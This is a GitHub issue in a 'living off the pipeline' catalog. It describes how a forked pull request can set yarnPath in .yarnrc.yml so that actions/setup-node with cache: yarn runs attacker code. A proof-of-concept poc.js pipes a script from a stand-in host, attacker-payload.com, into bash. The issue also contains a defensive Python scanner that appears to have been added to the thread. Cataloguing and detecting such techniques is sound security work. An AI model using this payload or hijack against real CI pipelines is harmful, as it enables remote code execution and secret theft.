boostsecurityio/lotp
Apache License 2.0

[LOTP] Add `actions/setup-node` #38

Open AdnaneKhan opened 2 months ago

AdnaneKhan commented 2 months ago

Description of the LOTP tool

actions/setup-node is used to set up a Node environment. It supports a cache flag which calls npm or yarn under the hood in order to cache dependencies.

I haven't fully analyzed this, but have validated the yarn case on a disclosure that is currently in progress.

If an attacker sees a workflow that checks out PR code and has the following:

    - name: Use Node.js 20
      uses: actions/setup-node@v4
      with:
        node-version: '20'
        cache: yarn

Then they can simply set the yarnPath config field in the .yarnrc.yml file from their fork and point it to a simple payload JavaScript file, like so:

    # .yarnrc.yml
    yarnPath: "./poc.js"

    // poc.js
    const { exec } = require('child_process');

    // Execute the bash command
    exec('bash -c "curl -sSfL attacker-payload.com/payload.sh | bash"', (error, stdout, stderr) => {
        if (error) {
            console.error(`Error: ${error.message}`);
            return;
        }

        if (stderr) {
            console.error(`stderr: ${stderr}`);
            return;
        }

        // Output the result
        console.log(`stdout: ${stdout}`);
    });

Configuration files

.yarnrc.yml

Documentation

https://yarnpkg.com/configuration/yarnrc

Real-world example

Pending :)
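One way to triage a repository for the pattern described in this issue, as an added example that is not part of the issue or of the lotp project: a line-based scan that flags `actions/setup-node` steps which set the `cache` input after an earlier checkout has populated the working tree, and a companion check that reports whether a `.yarnrc.yml` overrides `yarnPath`. The sample workflow and `.yarnrc.yml` below are constructed from the snippets in the issue; the `pull_request_target` trigger, the explicit PR head `ref`, and the `risk` labels are this example's assumptions, and the scan is a heuristic rather than a YAML parser.

```python
import re

# Added example, not code from the lotp project or the issue author. Line-based on
# purpose so it runs without a YAML library; treat it as a triage aid, not a parser.
STEP_START = re.compile(r"^\s*-\s")                      # a new list item (step) begins
USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
KEY_VALUE = re.compile(r"^\s*([A-Za-z_-]+):\s*(.*?)\s*$")
PR_HEAD_REF = re.compile(r"pull_request\.head|github\.head_ref")
YARN_PATH = re.compile(r"""^\s*yarnPath:\s*["']?([^"'\s#]+)""")


def scan_workflow(text):
    """Flag actions/setup-node steps that set `cache` after repository code was checked out.

    setup-node's cache mode invokes the package manager from the working tree, so with
    `cache: yarn` a .yarnrc.yml in that tree decides which script "yarn" is. The step only
    matters when an earlier checkout put untrusted code into that tree.
    """
    findings = []
    last_checkout = None          # `uses:` of the most recent actions/checkout step
    checkout_is_pr_head = False   # that checkout pinned the PR head ref explicitly
    step_uses, step_line = None, 0
    for no, line in enumerate(text.splitlines(), 1):
        if STEP_START.match(line):
            step_uses = None
        m = USES.match(line)
        if m:
            step_uses, step_line = m.group(1), no
            if step_uses.startswith("actions/checkout"):
                last_checkout, checkout_is_pr_head = step_uses, False
            continue
        m = KEY_VALUE.match(line)
        if not m or step_uses is None:
            continue
        key, value = m.group(1), m.group(2).strip("'\"")
        if step_uses.startswith("actions/checkout") and key == "ref" and PR_HEAD_REF.search(value):
            checkout_is_pr_head = True
        elif step_uses.startswith("actions/setup-node") and key == "cache" and value:
            if last_checkout is None:
                risk = "low"      # nothing checked out yet, so no attacker-controlled .yarnrc.yml
            elif checkout_is_pr_head:
                risk = "high"     # PR head checked out first, then yarn invoked from that tree
            else:
                risk = "review"   # a checkout precedes; whether it is PR code depends on the trigger
            findings.append({"line": step_line, "cache": value, "risk": risk})
    return findings


def yarnrc_yarn_path(text):
    """Return the yarnPath value from a .yarnrc.yml, or None if it is not overridden."""
    for line in text.splitlines():
        m = YARN_PATH.match(line)
        if m:
            return m.group(1)
    return None


# Constructed sample: the issue's setup-node step preceded by a checkout of the PR head.
SAMPLE_WORKFLOW = """\
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Use Node.js 20
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          cache: yarn
"""
# Hardened variant (assumption): the same job with the `cache` input dropped, so
# setup-node never runs yarn from the untrusted tree.
HARDENED_WORKFLOW = SAMPLE_WORKFLOW.replace("          cache: yarn\n", "")
# Constructed .yarnrc.yml mirroring the issue's one-line override.
SAMPLE_YARNRC = 'yarnPath: "./poc.js"\n'

if __name__ == "__main__":
    for name, wf in (("sample", SAMPLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(name, scan_workflow(wf))
    print("yarnPath override:", yarnrc_yarn_path(SAMPLE_YARNRC))
```

A `high` finding paired with a non-empty `yarnPath` from `yarnrc_yarn_path` is the combination the issue describes; the two checks are kept separate because the `.yarnrc.yml` lives in the PR branch, not in the repository's own tree, so the scan of the workflow is what tells you whether the pattern can be reached at all.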

fproulx-boostsecurity commented 2 months ago

Thanks my friend, feel free to make a PR out of that, but the GitHub Issues backlog is already getting juicy enough for quick ref :)